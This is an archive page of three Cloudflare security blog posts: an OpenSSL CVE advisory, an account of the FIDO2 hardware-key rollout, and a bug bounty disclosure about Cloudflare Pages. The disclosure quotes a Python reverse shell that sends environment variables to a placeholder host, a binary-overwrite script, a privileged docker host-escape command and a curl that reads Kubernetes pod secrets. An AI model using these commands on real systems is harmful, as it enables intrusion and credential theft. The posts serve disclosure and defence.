All posts by Evan Johnson

Cloudflare is not affected by the OpenSSL vulnerabilities CVE-2022-3602 and CVE-2022-37

2022-11-02 Evan Johnson

Post Syndicated from Evan Johnson original https://blog.cloudflare.com/cloudflare-is-not-affected-by-the-openssl-vulnerabilities-cve-2022-3602-and-cve-2022-37/

Cloudflare is not affected by the OpenSSL vulnerabilities CVE-2022-3602 and CVE-2022-37

Yesterday, November 1, 2022, OpenSSL released version 3.0.7 to patch CVE-2022-3602 and CVE-2022-3786, two HIGH risk vulnerabilities in the OpenSSL 3.0.x cryptographic library. Cloudflare is not affected by these vulnerabilities because we use BoringSSL in our products.

These vulnerabilities are memory corruption issues, in which attackers may be able to execute arbitrary code on a victim’s machine. CVE-2022-3602 was initially announced as a CRITICAL severity vulnerability, but it was downgraded to HIGH because it was deemed difficult to exploit with remote code execution (RCE). Unlike previous situations where users of OpenSSL were almost universally vulnerable, software that is using other versions of OpenSSL (like 1.1.1) are not vulnerable to this attack.

How do these issues affect clients and servers?

These vulnerabilities reside in the code responsible for X.509 certificate verification – most often executed on the client side to authenticate the server and the certificate presented. In order to be impacted by this vulnerability the victim (client or server) needs a few conditions to be true:

A malicious certificate needs to be signed by a Certificate Authority that the victim trusts.
The victim needs to validate the malicious certificate or ignore a series of warnings from the browser.
The victim needs to be running OpenSSL 3.0.x before 3.0.7.

For a client to be affected by this vulnerability, they would have to visit a malicious site that presents a certificate containing an exploit payload. In addition, this malicious certificate would have to be signed by a trusted certificate authority (CA).

Servers with a vulnerable version of OpenSSL can be attacked if they support mutual authentication – a scenario where both client and a server provide a valid and signed X.509 certificate, and the client is able to present a certificate with an exploit payload to the server.

How should you handle this issue?

If you’re managing services that run OpenSSL: you should patch vulnerable OpenSSL packages. On a Linux system you can determine if you have any processes dynamically loading OpenSSL with the lsof command. Here’s an example of finding OpenSSL being used by NGINX.

root@55f64f421576:/# lsof | grep libssl.so.3
nginx   1294     root  mem       REG              254,1           925009 /usr/lib/x86_64-linux-gnu/libssl.so.3 (path dev=0,142)

Once the package maintainers for your Linux distro release OpenSSL 3.0.7 you can patch by updating your package sources and upgrading the libssl3 package. On Debian and Ubuntu this can be done with the apt-get upgrade command

root@55f64f421576:/# apt-get --only-upgrade install libssl3

With that said, it’s possible that you could be running a vulnerable version of OpenSSL that the lsof command can’t find because your process is statically compiled. It’s important to update your statically compiled software that you are responsible for maintaining, and make sure that over the coming days you are updating your operating system and other installed software that might contain the vulnerable OpenSSL versions.

Key takeaways

Cloudflare’s use of BoringSSL helped us be confident that the issue would not impact us prior to the release date of the vulnerabilities.

More generally, the vulnerability is a reminder that memory safety is still an important issue. This issue may be difficult to exploit because it requires a maliciously crafted certificate that is signed by a trusted CA, and certificate issuers are likely to begin validating that the certificates they sign don’t contain payloads that exploit these vulnerabilities. However, it’s still important to patch your software and upgrade your vulnerable OpenSSL packages to OpenSSL 3.0.7 given the severity of the issue.

To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.

How Cloudflare implemented hardware keys with FIDO2 and Zero Trust to prevent phishing

2022-09-29 Evan Johnson

Post Syndicated from Evan Johnson original https://blog.cloudflare.com/how-cloudflare-implemented-fido2-and-zero-trust/

How Cloudflare implemented hardware keys with FIDO2 and Zero Trust to prevent phishing

Cloudflare’s security architecture a few years ago was a classic “castle and moat” VPN architecture. Our employees would use our corporate VPN to connect to all the internal applications and servers to do their jobs. We enforced two-factor authentication with time-based one-time passcodes (TOTP), using an authenticator app like Google Authenticator or Authy when logging into the VPN but only a few internal applications had a second layer of auth. That architecture has a strong looking exterior, but the security model is weak. We recently detailed the mechanics of a phishing attack we prevented, which walks through how attackers can phish applications that are “secured” with second factor authentication methods like TOTP. Happily, we had long done away with TOTP and replaced it with hardware security keys and Cloudflare Access. This blog details how we did that.

The solution to the phishing problem is through a multi-factor authentication (MFA) protocol called FIDO2/WebAuthn. Today, all Cloudflare employees log in with FIDO2 as their secure multi-factor and authenticate to our systems using our own Zero Trust products. Our newer architecture is phish proof and allows us to more easily enforce the least privilege access control.

A little about the terminology of security keys and what we use

In 2018, we knew we wanted to migrate to phishing-resistant MFA. We had seen evilginx2 and the maturity around phishing push-based mobile authenticators, and TOTP. The only phishing-resistant MFA that withstood social engineering and credential stealing attacks were security keys that implement FIDO standards. FIDO-based MFA introduces new terminology, such as FIDO2, WebAuthn, hard(ware) keys, security keys, and specifically, the YubiKey (the name of a well-known manufacturer of hardware keys), which we will reference throughout this post.

WebAuthn refers to the web authentication standard, and we wrote in depth about how that protocol works when we released support for security keys in the Cloudflare dashboard.

CTAP1(U2F) and CTAP2 refers to the client to authenticator protocol which details how software or hardware devices interact with the platform performing the WebAuthn protocol.

FIDO2 is the collection of these two protocols being used for authentication. The distinctions aren’t important, but the nomenclature can be confusing.

The most important thing to know is all of these protocols and standards were developed to create open authentication protocols that are phishing-resistant and can be implemented with a hardware device. In software, they are implemented with Face ID, Touch ID, Windows Assistant, or similar. In hardware a YubiKey or other separate physical device is used for authentication with USB, Lightning, or NFC.

FIDO2 is phishing-resistant because it implements a challenge/response that is cryptographically secure, and the challenge protocol incorporates the specific website or domain the user is authenticating to. When logging in, the security key will produce a different response on example.net than when the user is legitimately trying to log in on example.com.

At Cloudflare, we’ve issued multiple types of security keys to our employees over the years, but we currently issue two different FIPS-validated security keys to all employees. The first key is a YubiKey 5 Nano or YubiKey 5C Nano that is intended to stay in a USB slot on our employee laptops at all times. The second is the YubiKey 5 NFC or YubiKey 5C NFC that works on desktops and on mobile either through NFC or USB-C.

In late 2018 we distributed security keys at a whole company event. We asked all employees to enroll their keys, authenticate with them, and ask questions about the devices during a short workshop. The program was a huge success, but there were still rough edges and applications that didn’t work with WebAuthn. We weren’t ready for full enforcement of security keys and needed some middle-ground solution while we worked through the issues.

The beginning: selective security key enforcement with Cloudflare Zero Trust

We have thousands of applications and servers we are responsible for maintaining, which were protected by our VPN. We started migrating all of these applications to our Zero Trust access proxy at the same time that we issued our employees their set of security keys.

Cloudflare Access allowed our employees to securely access sites that were once protected by the VPN. Each internal service would validate a signed credential to authenticate a user and ensure the user had signed in with our identity provider. Cloudflare Access was necessary for our rollout of security keys because it gave us a tool to selectively enforce the first few internal applications that would require authenticating with a security key.

We used Terraform when onboarding our applications to our Zero Trust products and this is the Cloudflare Access policy where we first enforced security keys. We set up Cloudflare Access to use OAuth2 when integrating with our identity provider and the identity provider informs Access about which type of second factor was used as part of the OAuth flow.

In our case, swk is a proof of possession of a security key. If someone logged in and didn’t use their security key they would be shown a helpful error message instructing them to log in again and press on their security key when prompted.

Selective enforcement instantly changed the trajectory of our security key rollout. We began enforcement on a single service on July 29, 2020, and authentication with security keys massively increased over the following two months. This step was critical to give our employees an opportunity to familiarize themselves with the new technology. A window of selective enforcement should be at least a month to account for people on vacation, but in hindsight it doesn’t need to be much longer than that.

What other security benefits did we get from moving our applications to use our Zero Trust products and off of our VPN? With legacy applications, or applications that don’t implement SAML, this migration was necessary for enforcement of role based access control and the principle of the least privilege. A VPN will authenticate your network traffic but all of your applications will have no idea who the network traffic belongs to. Our applications struggled to enforce multiple levels of permissions and each had to re-invent their own auth scheme.

When we onboarded to Cloudflare Access we created groups to enforce RBAC and tell our applications what permission level each person should have.

Here’s a site where only members of the ACL-CFA-CFDATA-argo-config-admin-svc group have access. It enforces that the employee used their security key when logging in, and no complicated OAuth or SAML integration was needed for this. We have over 600 internal sites using this same pattern and all of them enforce security keys.

The end of optional: the day Cloudflare dropped TOTP completely

In February 2021, our employees started to report social engineering attempts to our security team. They were receiving phone calls from someone claiming to be in our IT department, and we were alarmed. We decided to begin requiring security keys to be used for all authentication to prevent any employees from being victims of the social engineering attack.

After disabling all other forms of MFA (SMS, TOTP etc.), except for WebAuthn, we were officially FIDO2 only. “Soft token” (TOTP) isn’t perfectly at zero on this graph though. This is caused because those who lose their security keys or become locked out of their accounts need to go through a secure offline recovery process where logging in is facilitated through an alternate method. Best practice is to distribute multiple security keys for employees to allow for a back-up, in case this situation arises.

Now that all employees are using their YubiKeys for phishing-resistant MFA are we finished? Well, what about SSH and non-HTTP protocols? We wanted a single unified approach to identity and access management so bringing security keys to arbitrary other protocols was our next consideration.

Using security keys with SSH

To support bringing security keys to SSH connections we deployed Cloudflare Tunnel to all of our production infrastructure. Cloudflare Tunnel seamlessly integrates with Cloudflare Access regardless of the protocol transiting the tunnel, and running a tunnel requires the tunnel client cloudflared. This means that we could deploy the cloudflared binary to all of our infrastructure and create a tunnel to each machine, create Cloudflare Access policies where security keys are required, and ssh connections would start requiring security keys through Cloudflare Access.

In practice these steps are less intimidating than they sound and the Zero Trust developer docs have a fantastic tutorial on how to do this. Each of our servers have a configuration file required to start the tunnel. Systemd invokes cloudflared which uses this (or similar) configuration file when starting the tunnel.

tunnel: 37b50fe2-a52a-5611-a9b1-ear382bd12a6
credentials-file: /root/.cloudflared/37b50fe2-a52a-5611-a9b1-ear382bd12a6.json

ingress:
  - hostname: <identifier>.ssh.cloudflare.com
    service: ssh://localhost:22
  - service: http_status:404

When an operator needs to SSH into our infrastructure they use the ProxyCommand SSH directive to invoke cloudflared, authenticate using Cloudflare Access, and then forward the SSH connection through Cloudflare. Our employees’ SSH configurations have an entry that looks kind of like this, and can be generated with a helper command in cloudflared:

Host *.ssh.cloudflare.com
    ProxyCommand /usr/local/bin/cloudflared access ssh –hostname %h.ssh.cloudflare.com

It’s worth noting that OpenSSH has supported FIDO2 since version 8.2, but we’ve found there are benefits to having a unified approach to access control where all access control lists are maintained in a single place.

What we’ve learned and how our experience can help you

There’s no question after the past few months that the future of authentication is FIDO2 and WebAuthn. In total this took us a few years, and we hope these learnings can prove helpful to other organizations who are looking to modernize with FIDO-based authentication.

If you’re interested in rolling out security keys at your organization, or you’re interested in Cloudflare’s Zero Trust products, reach out to [email protected]. Although we’re happy that our preventative efforts helped us resist the latest round of phishing and social engineering attacks, our security team is still growing to help prevent whatever comes next.

The Cloudflare Bug Bounty program and Cloudflare Pages

2022-05-06 Evan Johnson

Post Syndicated from Evan Johnson original https://blog.cloudflare.com/pages-bug-bounty/

The Cloudflare Bug Bounty program and Cloudflare Pages

The Cloudflare Pages team recently collaborated closely with security researchers at Assetnote through our Public Bug Bounty. Throughout the process we found and have fully patched vulnerabilities discovered in Cloudflare Pages. You can read their detailed write-up here. There is no outstanding risk to Pages customers. In this post we share information about the research that could help others make their infrastructure more secure, and also highlight our bug bounty program that helps to make our product more secure.

Cloudflare cares deeply about security and protecting our users and customers — in fact, it’s a big part of the reason we’re here. But how does this manifest in terms of how we run our business? There are a number of ways. One very important prong of this is our bug bounty program that facilitates and rewards security researchers for their collaboration with us.

But we don’t just fix the security issues we learn about — in order to build trust with our customers and the community more broadly, we are transparent about incidents and bugs that we find.

Recently, we worked with a group of researchers on improving the security of Cloudflare Pages. This collaboration resulted in several security vulnerability discoveries that we quickly fixed. We have no evidence that malicious actors took advantage of the vulnerabilities found. Regardless, we notified the limited number of customers that might have been exposed.

In this post we are publicly sharing what we learned, and the steps we took to remediate what was identified. We are thankful for the collaboration with the researchers, and encourage others to use the bounty program to work with us to help us make our services — and by extension the Internet — more secure!

What happens when a vulnerability is reported?

Once a vulnerability has been reported via HackerOne, it flows into our vulnerability management process:

We investigate the issue to understand the criticality of the report.
We work with the engineering teams to scope, implement, and validate a fix to the problem. For urgent problems we start working with engineering immediately, and less urgent issues we track and prioritize alongside engineering’s normal bug fixing cadences.
Our Detection and Response team investigates high severity issues to see whether the issue was exploited previously.

This process is flexible enough that we can prioritize important fixes same-day, but we never lose track of lower criticality issues.

What was discovered in Cloudflare Pages?

The Pages team had to solve a pretty difficult problem for Cloudflare Builds (our CI/CD build pipeline): how can we run untrusted code safely in a multi-tenant environment? Like all complex engineering problems, getting this right has been an iterative process. In all cases, we were able to quickly and definitively address bugs reported by security researchers. However, as we continued to work through reports by the researchers, it became clear that our initial build architecture decisions provided too large an attack surface. The Pages team pivoted entirely and re-architected our platform in order to use gVisor and further isolate builds.

When determining impact, it is not enough to find no evidence that a bug was exploited, we must conclusively prove that it was not exploited. For almost all the bugs reported, we found definitive signals in audit logs and were able to correlate that data exclusively against activity by trusted security researchers.

However, for one bug, while we found no evidence that the bug was exploited beyond the work of security researchers, we were not able meaningfully prove that it was not. In the spirit of full transparency, we notified all Pages users that may have been impacted.

Now that all the issues have been remedied, and individual customers have been notified, we’d like to share more information about the issues.

Bug 1: Command injection in CLONE_REPO

With a flaw in our logic during build initialization, it was possible to execute arbitrary code, echo environment variables to a file and then read the contents of that file.

The crux of the bug was that root_dir in this line of code was attacker controlled. After gaining control the researcher was able to specially craft a malicious root_dir to dump the environment variables of the process to a file. Those environment variables contained our GitHub bot’s authorization key. This would have allowed the attacker to read the repositories of other Pages’ customers, and many of those repositories are private.

After fixing the input validation for this field to prevent the bug, and rolling the disclosed keys, we investigated all other paths that had ever been set by our Pages customers to see if this attack had ever been performed by any other (potentially malicious) security researchers. We had logs showing that this was the first this particular attack had ever been performed, and responsibly reported.

Bug 2: Command injection in PUBLISH_ASSETS

This bug is nearly identical to the first one, but on the publishing step instead of the clone step. We went to work rotating the secrets that were exposed, fixing the input validation issues, and rotating the exposed secrets. We investigated the Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research being performed.

Bug 3: Cloudflare API key disclosure in the asset publishing process

While building customer pages, a program called /opt/pages/bin/pages-metadata-generator is involved. This program had the Linux permissions of 777, allowing all users on the machine to read the program, execute the program, but most importantly overwrite the program. If you can overwrite the program prior to its invocation, the program might run with higher permissions when the next user comes along and wants to use it.

In this case the attack is simple. When a Pages build runs, the following build.sh is specified to run, and it can overwrite the executable with a new one.

#!/bin/bash
cp pages-metadata-generator /opt/pages/bin/pages-metadata-generator

This allows the attacker to provide their own pages-metadata-generator program that is run with a populated set of environment variables. The proof of concept provided to Cloudflare was this minimal reverse shell.

#!/bin/bash
echo "henlo fren"
export > /tmp/envvars
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x.x",9448));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

With a reverse shell, the attackers only need to run `env` to see a list of environment variables that the program was invoked with. We fixed the file permissions of the process, rotated the credentials, and investigated in Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research.

Bug 4: Bash path injection

This issue was very similar to Bug 3. The PATH environment variable contained a large set of directories for maximum compatibility with different developer tools.

PATH=/opt/buildhome/.swiftenv/bin:/opt/buildhome/.swiftenv/shims:/opt/buildhome/.php:/opt/buildhome/.binrc/bin:/usr/local/rvm/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/buildhome/.cask/bin:/opt/buildhome/.gimme/bin:/opt/buildhome/.dotnet/tools:/opt/buildhome/.dotnet

Unfortunately not all of these directories were set to the proper filesystem permissions allowing a malicious version of the program bash to be written to them, and later invoked by the Pages build process. We patched this bug, rotated the impacted credentials, and investigated in Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research.

Bug 5: Azure pipelines escape

Back when this research was conducted we were running Cloudflare Pages on Azure Pipelines. Builds were taking place in highly privileged containers and the containers had the docker socket available to them. Once the researchers had root within these containers, escaping them was trivial after installing docker and mounting the root directory of the host machine.

sudo docker run -ti --privileged --net=host -v /:/host -v /dev:/dev -v /run:/run ubuntu:latest

Once they had root on the host machine, they were able to recover Azure DevOps credentials from the host which gave access to the Azure Organization that Cloudflare Pages was running within.

The credentials that were recovered gave access to highly audited APIs where we could validate that this issue was not previously exploited outside this security research.

Bug 6: Pages on Kubernetes

After receipt of the above bugs, we decided to change the architecture of Pages. One of these changes was migration of the product from Azure to Kubernetes, and simplifying the workflow, so the attack surface was smaller and defensive programming practices were easier to implement. After the change, Pages builds are within Kubernetes Pods and are seeded with the minimum set of credentials needed.

As part of this migration, we left off a very important iptables rule in our Kubernetes control plane, making it easy to curl the Kubernetes API and read secrets related to other Pods in the cluster (each Pod representing a separate Pages build).

curl -v -k [http://10.124.200.1:10255/pods](http://10.124.200.1:10255/pods)

We quickly patched this issue with iptables rules to block network connections to the Kubernetes control plane. One of the secrets available to each Pod was the GitHub OAuth secret which would have allowed someone who exploited this issue to read the GitHub repositories of other Pages’ customers.

In the previously reported issues we had robust logs that showed us that the attacks that were being performed had never been performed by anyone else. The logs related to inspecting Pods were not available to us, so we decided to notify all Cloudflare Pages customers that had ever had a build run on our Kubernetes-based infrastructure. After patching the issue and investigating which customers were impacted, we emailed impacted customers on February 3 to tell them that it’s possible someone other than the researcher had exploited this issue, because our logs couldn’t prove otherwise.

Takeaways

We are thankful for all the security research performed on our Pages product, and done so at such an incredible depth. CI/CD and build infrastructure security problems are notoriously hard to prevent. A bug bounty that incentivizes researchers to keep coming back is invaluable, and we appreciate working with researchers who were flexible enough to perform great research, and work with us as we re-architected the product for more robustness. An in-depth write-up of these issues is available from the Assetnote team on their website.

More than this, however, the work of all these researchers is one of the best ways to test the security architecture of any product. While it might seem counter-intuitive after a post listing out a number of bugs, all these diligent eyes on our products allow us to feel much more confident in the security architecture of Cloudflare Pages. We hope that our transparency, and our description of the work done on our security posture, enables you to feel more confident, too.

Finally: if you are a security researcher, we’d love to work with you to make our products more secure. Check out hackerone.com/cloudflare for more info!

Noise

All posts by Evan Johnson

Cloudflare is not affected by the OpenSSL vulnerabilities CVE-2022-3602 and CVE-2022-37

How do these issues affect clients and servers?

How should you handle this issue?

Key takeaways

How Cloudflare implemented hardware keys with FIDO2 and Zero Trust to prevent phishing

A little about the terminology of security keys and what we use

The beginning: selective security key enforcement with Cloudflare Zero Trust

The end of optional: the day Cloudflare dropped TOTP completely

Using security keys with SSH

What we’ve learned and how our experience can help you

The Cloudflare Bug Bounty program and Cloudflare Pages

What happens when a vulnerability is reported?

What was discovered in Cloudflare Pages?

Bug 1: Command injection in CLONE_REPO

Bug 2: Command injection in PUBLISH_ASSETS

Bug 3: Cloudflare API key disclosure in the asset publishing process

Bug 4: Bash path injection

Bug 5: Azure pipelines escape

Bug 6: Pages on Kubernetes

Takeaways

The collective thoughts of the interwebz